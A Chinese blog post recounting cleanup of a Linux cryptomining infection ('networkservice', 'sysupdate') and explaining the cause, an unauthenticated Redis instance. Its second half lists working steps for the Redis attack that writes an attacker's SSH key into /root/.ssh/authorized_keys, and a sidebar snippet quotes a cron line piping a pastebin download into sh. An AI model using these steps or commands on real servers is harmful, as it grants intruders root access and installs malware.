记一次 LINUX 挖矿病毒 networkservice 分析 原因通过redis入侵

最新推荐文章于 2024-03-20 06:30:45 发布
最新推荐文章于 2024-03-20 06:30:45 发布
阅读量2.1k 收藏 7
点赞数
分类专栏: # linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_37288522/article/details/103420355
版权

单位ip被电信拉黑,原因恶意访问非法目的地;

通过安全防护软件分析一台服务器不断向国外不同国家发包请求;定位到服务器 192.168.2.110

登陆服务器一看cpu 爆满;

看是服务networkservice;不知所以然;百度一下 发现有同学已经中招了 定位是 挖矿病毒 networkservice;

清除的过程

使用top已经知道了进程号,接下来看看位置,命令ls -l proc/{进程号30262}/exe

 

sysupdate、networkservice都在/etc/目录下
到etc下,除了sysupdate、networkservice 同时还有sysguard、update.sh,除了update.sh其余的都是二进制文件,应该就是挖矿的主程序以及守护程序了

  1. 删除定时任务

    1

    rm /var/spool/cron/root 或crontab -r

  2. 杀掉进程 删除文件
    首先杀进程,kill -9 {进程号},然后删除文件
    直接删除sysupdate你会发现无法删除,因为一般病毒会使用chattr +i命令,我们使用chattr -i sysupdate,然后再 rm -f sysupdate 即可正常删除。
    同理删除networkservice、sysguard、update.sh、config.json。

  3. /root/.ssh/authorized_keys 删除或修复

  4. 如果你被攻破的是root用户(或者被攻破的用户权限较大),你可能还需要

  5. 修复SELinux
    病毒脚本首先就会尝试关闭SELinux子系统,我们可以使用getenforce命令查看SELinux状态。
    如果你想要重新打开,可以修改/etc/selinux/config文件将SELINUX=disabled改为SELINUX=enforcing,然后重新启动服务器。

  6. wget命令和curl命令会被改为wge和cur,这样用着很变扭,改回来

    1
2
3
4

    mv /bin/wge /bin/wget
mv /bin/cur /bin/curl
mv /usr/bin/wge /usr/bin/wget
mv /usr/bin/cur /usr/bin/curl

  7. 恢复防火墙配置
    这里给出病毒脚本修改的iptables配置的语句,方便读者修复

    1
2
3
4
5
6
7
8

    iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -I INPUT -s 43.245.222.57 -j DROP
service iptables reload

    如果你的iptables策略确定被清除并且修改了,那直接清空并重新配置即可。

 

 

 

 

下面是隔壁团队成员提供的中招原因

通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。

一,生成本地ssh公钥

ssh-keygen

 

二,先连接redis看看

telnet 192.168.15.10 6379
redis-cli -h 192.168.15.10

 

 

三, 清一下redis数据库

redis-cli -h 192.168.15.10 flushall

 

 

四, 向redis写自己的公钥

cat key.txt |redis-cli -h 192.168.15.10 -x set redis

 

 

五, 利用redis写入到文件中

#连接redis
#redis-cli -h 192.168.15.10
#查看keys
192.168.15.10>keys *
#写入配置库的路径及存放位置
192.168.15.10>CONFIG SET dir /root/.ssh/
#写入配置库名称及存放的名字
192.168.15.10>CONFIG SET dbfilename "authorized_keys"
#写入
192.168.15.10>save
#退出
192.168.15.10>exit

 

 

六, 远程连接

ssh root@192.168.15.10

 

 

注意,这个是使用的默认的。也就是说别人是用的root来启动的redis 并且没有更改sshd配置文件的位置,以及redis可以默认的可以随意访问性的。当然有许多可以猜。

这个是最近redis爆出来的。

 

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

 

球球罐罐
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
一款Linux、数据库、Redis、MongoDB统一管理平台.docx
11-09
一款Linux、数据库、Redis、MongoDB统一管理平台.docx
一次redis病毒分析
weixin_33779515的博客
09-05 198
起因 偶然间发现redis里有一个陌生key:tightsoft,它的值是:*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道这肯定不是我们存的,再看value我警觉了,这是要定时执行脚本啊。 分析 于是我便开始逐层拨开它的面纱,脚本的内容是来源于https://pastebin.com/raw/xbY...
被动抓病毒的日子(3)【入侵大佬:198.46.202.146】疑似从redis漏洞入侵,跑满在下的进程数和内存 ( •̥́ ˍ •̀ू )
谦怀
06-10 726
月常抓病毒水文 这次也是注入,不过都能搞到内网服务器了。 被入侵的服务器是内网的nginx代理服务器,默认文件倒是没有被删除,但跑满了的CPU实在不能忍。 抓到文件,就当是复习shell脚本了,技术不到家,代码容易被攻破啊。 攻击者获取文件地址:xia.beihaixue.com(香港) ...
我的阿里云服务器发现被中【挖矿程序病毒】 的解决处理
IT技术领域深耕10年+,北京大厂闯荡5年+
03-20 593
最近(2018.12)阿里云服务器给我发报警短信,提示服务器:进程异常行为-可疑Host访问行为,但因为只是一个自己玩玩的服务器,有时一尽快也没当回事,试着访问了服务器还都正常,后来甚至有报警:恶意进程(云查杀)-挖矿程序,这有一天有空就上来看看,一看问题大了,整个服务器的定时任务被改写了,成了乱码,检查一下其它的东西到还正常,不过打开网站发现突然很慢了,不错,是中毒了,门罗币(XMR)挖矿程序。这时基本的文件修改是改正过来了,但是服务器发现有些慢,找到了一个很耗CPU的进程zigw,杀掉了,
linux挖矿病毒nanominer伪装成python占用服务器GPU!本文带你分析并杀毒!
weixin_43693967的博客
05-18 2443
linux中了伪装成python的挖矿病毒,可以看到root用户将GPU的核心跑满了每个占用都是100%,显存吃了6G多。本文详细录了病毒的原理和查杀
linux redis病毒,Linux系统之Redis扩散病毒继续分析
weixin_35459464的博客
05-14 256
* soft nproc 100000root hard nproc 100000root soft nproc 100000EOF#防火墙修改redis只让本机访问iptables -I INPUT 1 -p tcp --dport 6379-j DROPiptables -I INPUT 1 -p tcp --...
linuxredis病毒pscan,Docker的redis容器导致被挖矿病毒*kdevtmpfsi * 入侵, 干它
weixin_29218509的博客
05-14 536
以下内容全凭忆。研发的一台docker创建了redis容器,直接设置无密访问导致被入侵。在母机上查询一下,其实第一个就可以了,第二个很多人搜索不到。[root@devtest tmp]# find / -name "*kdevtmpfsi*"/var/lib/docker/overlay2/0cf543cd0ddd70e9e68333057aefa1ca0c1864e5214630b4dd2f4...
录一下今天发生的linux挖矿病毒networkservice进程
weixin_41762839的博客
03-26 1421
一早上班打开电脑,习惯性的登陆服务器,没有往日的顺畅感,特别的慢,难道是因为我电脑不关机的原因? 此时我又打开了别的服务器,结果非常快的就上去了,这就不对劲了,马上却换到特别卡的那台服务器查看: 以为是内存溢出: free -h 发现内存很充足,并没有问题 随后top查看: top#排序cpu 结果看到了最高的两个进程networkservice,这是网络服务? 查找文...
解决挖矿病毒占用高cpu(sysupdate、networkservice
周大侠的博客
04-01 5047
我也是有一段时间服务器变的很卡,那时我还以为是我自己的软件装太多导致的问题,不看不知道,看了吓一跳,服务器已经被攻击了,接下来,我来分享下如何查找和解决这个病毒。 一、找出病毒 当发现服务器卡的时候,我们可以采用top命令,如下显示 image.png 我们注意看以上这几个进程,没稍加注意的话,我们还以为这几个是正常的进程,为啥呢? 1、毕竟这几个的user是apache、ww...
一次清除Linux挖矿病毒的经历(sysupdate, networkservice进程)
小陈没烦恼
12-04 740
前言 今天登上服务部署个文件,然后顺便看了一下cpu占用情况,然后我就发现CPU爆满,因为之前遇见过这个问题让别人给解决了,据说这是被挖矿了。通过kill命令结束掉这个进程一会就自己有起来了,所以我就百度了一下。看来还真有小伙伴跟我一下,所以我也自己录一下,方便以后查看。 查看CPU使用情况 通过top命令查看cpu占用情况,发现有一个程序占用90%多的cpu资源,那么着肯定是不正常。而且我们的发现他个伪装成了系统更新,可能小白中的小白就真的误以为系统更新占用了cpu。 删除木马...
一次清除Linux挖矿病毒的经历(sysupdate, networkservice进程)
热门推荐
daiyuhe的博客
07-16 2万+
起因 闲来无事准备用服务器搭建个环境玩玩,然后连上服务器之后命令行卡的飞起,使用top看看cpu占用率,不看不知道,一看特喵百分之百。排名前三的就是这三个玩意。 sysupdate? 系统更新?我好像也没开启自动更新啊 networkservice? 网络服务???WTF???? 接下来肯定是百度谷歌了,这里不得不吐槽一下百度,百度sysupdate就没啥有效信息。。 清除的过程 使用top已...
linux挖矿病毒分析
清扬叶
04-01 1499
发现问题: 在查询进程端口号占用时,发现查询特别慢,而当时运行的程序又很少,于是执行top命令发现存在一个networkservice进程的cpu占用率超过了100%,如图所示: networkservice和sysupdate都不是我们自己的运行程序,于是百度了一下,发现是linux挖矿病毒。 处理问题: 使用top查询到networkservice和...
Linux中设置Redis开机启动的方法
01-21
一、CentOS 7.0系统下的设置方法 假设Redis已经安装,版本3.2.4 #cd redis-3.2.4 #mkdir /etc/redis #cp redis.conf /etc/redis/6379.conf #cp utils/redis_init_script /etc/init.d/redis #chmod a+x /etc/init.d/...
redis-7.0.9Linux安装包
11-12
redis7.0.9linux安装包,执行tar-zxvf命令安装即可。安装后启动redis-server。
linux- redis了解,一篇就够了
08-05
redis了解,一篇就够了解压472123a,手把手教学 内容简要: redis-cluster架构图 , redis-cluster投票:容错 , 搭建Ruby环境, 集群的搭建过程。 NoSQL,即Not-Only SQL,泛指非关系型的数据库。它是为了解决...
一次Docker中Redis连接暴增的问题排查实战
01-20
一次碰到此类问题,心想难道是redis挂掉了,随即通过telnet ip+端口。发现运行正常,然后就想着进入redis看下目前连接情况。一看发现竟然高达1903条这么多。 然后想着应该是代码创建redis连接过多导致的,查看...
自动驾驶运动规划(Motion Planning).pdf
04-26
自动驾驶运动规划(Motion Planning)问题分析
财务数据分析模型6.xlsx
04-26
Excel数据看板,Excel办公模板,Excel模板下载,Excel数据统计,数据展示
人力资源数据分析看版.xlsx
最新发布
04-26
Excel数据看板,Excel办公模板,Excel模板下载,Excel数据统计,数据展示
linux redis 清理缓存shell脚本
09-06
你可以使用以下的shell脚本来清理Redis缓存: ```bash #!/bin/bash # 设置Redis服务器的IP和端口 REDIS_HOST="localhost" REDIS_PORT="6379" # 清理Redis缓存 redis-cli -h $REDIS_HOST -p $REDIS_PORT flushall echo "Redis缓存已清理!" ``` 将上述代码保存为一个.sh文件(比如`clean_redis_cache.sh`),然后在终端中运行该脚本即可清理Redis缓存。确保你已经安装了Redis客户端,并且脚本中的IP和端口与你的Redis服务器配置相匹配。 使用方法: 1. 打开终端。 2. 进入脚本所在的目录。 3. 运行以下命令来赋予脚本执行权限: ```bash chmod +x clean_redis_cache.sh ``` 4. 执行脚本: ```bash ./clean_redis_cache.sh ``` 这样就能清理你的Redis缓存了。请确保在运行脚本之前备份重要的缓存数据,以防误操作导致数据丢失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值